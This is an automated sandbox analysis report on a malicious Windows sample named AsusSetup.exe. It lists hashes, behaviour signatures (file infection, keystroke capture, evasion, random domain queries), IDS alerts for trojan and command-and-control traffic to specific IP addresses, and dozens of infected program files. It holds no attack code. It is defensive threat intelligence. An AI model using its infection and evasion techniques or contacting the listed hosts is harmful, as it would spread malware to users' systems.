Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AsusSetup.exe

Overview

General Information

Sample name:AsusSetup.exe
Analysis ID:1543957
MD5:13bf2819401d2f983fff90c1960831b8
SHA1:0b8058088b47edbcf963ac2ac7d5b23fa35e0e90
SHA256:7db9ca7dbe9a5724ef452585280e73a1a73563cc6a2559f2588d613454f70261
Tags:exeExpirouser-lschab
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Contains functionality to behave differently if execute on a Russian/Kazak computer
Creates files in the system32 config directory
Drops executable to a common third party application directory
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries random domain names (often used to prevent blacklisting and sinkholes)
Binary contains a suspicious time stamp
Connects to many different domains
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • AsusSetup.exe (PID: 6452 cmdline: "C:\Users\user\Desktop\AsusSetup.exe" MD5: 13BF2819401D2F983FFF90C1960831B8)
  • armsvc.exe (PID: 6612 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: B304B3F52DE20CFC59D49162F1E99EEA)
  • alg.exe (PID: 6732 cmdline: C:\Windows\System32\alg.exe MD5: 0E2255EDBB351BDA0949D09F88FA226E)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 6996 cmdline: C:\Windows\system32\AppVClient.exe MD5: 8DF9B4C3E64A3509DEE72C0E8333DDA6)
  • FXSSVC.exe (PID: 6104 cmdline: C:\Windows\system32\fxssvc.exe MD5: 0EC424B89B232FD9D839942FBC5274E2)
  • maintenanceservice.exe (PID: 1748 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: DF7731CD51167F1E9F73863D919CAC1B)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Execution of Suspicious File Type Extension
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-28T16:39:08.047629+010020516541A Network Trojan was detected192.168.2.4508391.1.1.153UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-28T16:38:36.094787+010020516511A Network Trojan was detected192.168.2.4604871.1.1.153UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-28T16:39:02.026892+010020516531A Network Trojan was detected192.168.2.4538381.1.1.153UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-28T16:37:11.575918+010020516491A Network Trojan was detected192.168.2.4582961.1.1.153UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-28T16:37:10.083474+010020516481A Network Trojan was detected192.168.2.4532481.1.1.153UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-28T16:37:06.202513+010020181411A Network Trojan was detected54.244.188.17780192.168.2.449732TCP
2024-10-28T16:37:07.760195+010020181411A Network Trojan was detected18.141.10.10780192.168.2.449733TCP
2024-10-28T16:37:10.047679+010020181411A Network Trojan was detected44.221.84.10580192.168.2.449738TCP
2024-10-28T16:37:35.211531+010020181411A Network Trojan was detected47.129.31.21280192.168.2.449752TCP
2024-10-28T16:37:36.856537+010020181411A Network Trojan was detected13.251.16.15080192.168.2.449753TCP
2024-10-28T16:37:42.766102+010020181411A Network Trojan was detected18.208.156.24880192.168.2.449759TCP
2024-10-28T16:37:49.539296+010020181411A Network Trojan was detected35.164.78.20080192.168.2.449764TCP
2024-10-28T16:37:50.475191+010020181411A Network Trojan was detected3.94.10.3480192.168.2.449765TCP
2024-10-28T16:38:02.711736+010020181411A Network Trojan was detected18.246.231.12080192.168.2.449787TCP
2024-10-28T16:38:13.503761+010020181411A Network Trojan was detected34.211.97.4580192.168.2.449850TCP
2024-10-28T16:38:17.064873+010020181411A Network Trojan was detected3.254.94.18580192.168.2.449873TCP
2024-10-28T16:38:27.780922+010020181411A Network Trojan was detected34.246.200.16080192.168.2.449935TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-28T16:37:06.202513+010020377711A Network Trojan was detected54.244.188.17780192.168.2.449732TCP
2024-10-28T16:37:07.760195+010020377711A Network Trojan was detected18.141.10.10780192.168.2.449733TCP
2024-10-28T16:37:10.047679+010020377711A Network Trojan was detected44.221.84.10580192.168.2.449738TCP
2024-10-28T16:37:35.211531+010020377711A Network Trojan was detected47.129.31.21280192.168.2.449752TCP
2024-10-28T16:37:36.856537+010020377711A Network Trojan was detected13.251.16.15080192.168.2.449753TCP
2024-10-28T16:37:42.766102+010020377711A Network Trojan was detected18.208.156.24880192.168.2.449759TCP
2024-10-28T16:37:49.539296+010020377711A Network Trojan was detected35.164.78.20080192.168.2.449764TCP
2024-10-28T16:37:50.475191+010020377711A Network Trojan was detected3.94.10.3480192.168.2.449765TCP
2024-10-28T16:38:02.711736+010020377711A Network Trojan was detected18.246.231.12080192.168.2.449787TCP
2024-10-28T16:38:13.503761+010020377711A Network Trojan was detected34.211.97.4580192.168.2.449850TCP
2024-10-28T16:38:17.064873+010020377711A Network Trojan was detected3.254.94.18580192.168.2.449873TCP
2024-10-28T16:38:27.780922+010020377711A Network Trojan was detected34.246.200.16080192.168.2.449935TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-28T16:37:07.754028+010028508511Malware Command and Control Activity Detected192.168.2.44973318.141.10.10780TCP
2024-10-28T16:38:08.321137+010028508511Malware Command and Control Activity Detected192.168.2.44982434.211.97.4580TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: AsusSetup.exeAvira: detected
Antivirus detection for dropped file
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeAvira: detection malicious, Label: W32/Infector.Gen
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
Machine Learning detection for dropped file
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJoe Sandbox ML: detected
Machine Learning detection for sample
Source: AsusSetup.exeJoe Sandbox ML: detected
Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 00000002.00000003.2102454337.00000000014A0000.00000004.00001000.00020000.00000000.sdmp, FullTrustNotifier.exe.2.dr
Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: AsusSetup.exe, 00000000.00000003.1693327541.0000000002AC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 00000002.00000003.2157726829.0000000001560000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2172626726.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2160809118.0000000001660000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 00000002.00000003.1800031110.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 00000002.00000003.1934452647.0000000001650000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 00000002.00000003.1934452647.0000000001650000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ADelRCP_Exec.pdb source: alg.exe, 00000002.00000003.1945933565.0000000001650000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdbGCTL source: alg.exe, 00000002.00000003.2216381785.0000000001610000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2212707992.0000000001610000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationFontCache.pdb source: AsusSetup.exe, 00000000.00000003.1725048803.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1742417137.00000000016D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: pack200.exe.2.dr
Source: Binary string: D:\GitSourceCode\AsTaskSched\Release\AsTaskSched.pdb source: AsusSetup.exe
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000002.00000003.1834641811.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: F:\SourceCodeTB\SCD_AutoRunSource\AsusSetup\x64\Release\AsusSetup.pdb source: AsusSetup.exe
Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: alg.exe, 00000002.00000003.2095082836.00000000014A0000.00000004.00001000.00020000.00000000.sdmp, MSRMSPIBroker.exe.2.dr
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 00000002.00000003.2196621773.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_proxy.exe.pdb source: msedge_proxy.exe.2.dr
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 00000002.00000003.2109815107.0000000001620000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2121918749.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: servertool.exe.2.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 00000002.00000003.1979810912.0000000001660000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Acrobat_SL.pdb((( source: alg.exe, 00000002.00000003.1805970736.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\GitSourceCode\AsTaskSched\x64\Release\AsTaskSched.pdb source: AsusSetup.exe
Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_proxy.exe.pdbOGP source: msedge_proxy.exe.2.dr
Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: AsusSetup.exe, 00000000.00000003.1714945382.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: java-rmi.exe.2.dr
Source: Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 00000002.00000003.1945933565.0000000001650000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\AdobeARMHelper.pdb source: AdobeARMHelper.exe.2.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: alg.exe, 00000002.00000003.1815895137.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Acrobat_SL.pdb source: alg.exe, 00000002.00000003.1805970736.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: private_browsing.pdb source: private_browsing.exe.2.dr
Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 00000002.00000003.2157726829.0000000001560000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2172626726.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2160809118.0000000001660000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java_objs\java.pdb source: java.exe.2.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000002.00000003.1834641811.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 00000002.00000003.2000319019.0000000001470000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 00000002.00000003.1800031110.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdb source: alg.exe, 00000002.00000003.2216381785.0000000001610000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2212707992.0000000001610000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: maintenanceservice.pdb source: alg.exe, 00000002.00000003.1747144791.00000000016D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 64BitMAPIBroker.pdb source: alg.exe, 00000002.00000003.2080481353.0000000001490000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 00000002.00000003.2196621773.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ADNotificationManager\Viewer Release_x64\ADNotificationManager.pdb source: alg.exe, 00000002.00000003.1957415043.0000000001480000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 00000002.00000003.2057462608.0000000001480000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 00000002.00000003.1979810912.0000000001660000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: servertool.exe.2.dr
Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 00000002.00000003.2102454337.00000000014A0000.00000004.00001000.00020000.00000000.sdmp, FullTrustNotifier.exe.2.dr
Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 00000002.00000003.2000319019.0000000001470000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 00000002.00000003.2065372565.0000000001660000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: private_browsing.pdbp source: private_browsing.exe.2.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: alg.exe, 00000002.00000003.2095082836.00000000014A0000.00000004.00001000.00020000.00000000.sdmp, MSRMSPIBroker.exe.2.dr
Source: Binary string: maintenanceservice.pdb` source: alg.exe, 00000002.00000003.1747144791.00000000016D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: java-rmi.exe.2.dr
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 00000002.00000003.2109815107.0000000001620000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2121918749.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\AdobeARMHelper.pdbr source: AdobeARMHelper.exe.2.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 00000002.00000003.2008264771.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ALG.pdb source: AsusSetup.exe, 00000000.00000003.1698531117.0000000002BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: minidump-analyzer.pdb source: minidump-analyzer.exe.2.dr
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: pack200.exe.2.dr
Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: AsusSetup.exe, 00000000.00000003.1714945382.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\Aut2Exe\Aut2Exe_x64.pdb source: Aut2exe_x64.exe.2.dr
Source: Binary string: ALG.pdbGCTL source: AsusSetup.exe, 00000000.00000003.1698531117.0000000002BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: AsusSetup.exe, 00000000.00000003.1725048803.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1742417137.00000000016D0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: d:\dbs\el\omr\target\x64\ship\c2rsvcmgr\x-none\OfficeSvcMgr.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: officesvcmgr.exe.2.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: alg.exe, 00000002.00000003.1815895137.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ADNotificationManager\Viewer Release_x64\ADNotificationManager.pdb22 source: alg.exe, 00000002.00000003.1957415043.0000000001480000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: d:\dbs\el\omr\target\x64\ship\c2rsvcmgr\x-none\OfficeSvcMgr.pdb source: officesvcmgr.exe.2.dr
Source: Binary string: AppVShNotify.pdb source: alg.exe, 00000002.00000003.2191374108.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 00000002.00000003.2065372565.0000000001660000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 00000002.00000003.2008264771.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: AppVShNotify.pdbGCTL source: alg.exe, 00000002.00000003.2191374108.0000000001550000.00000004.00001000.00020000.00000000.sdmp

Spreading

barindex
Infects executable files (exe, dll, sys, html)
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to behavior
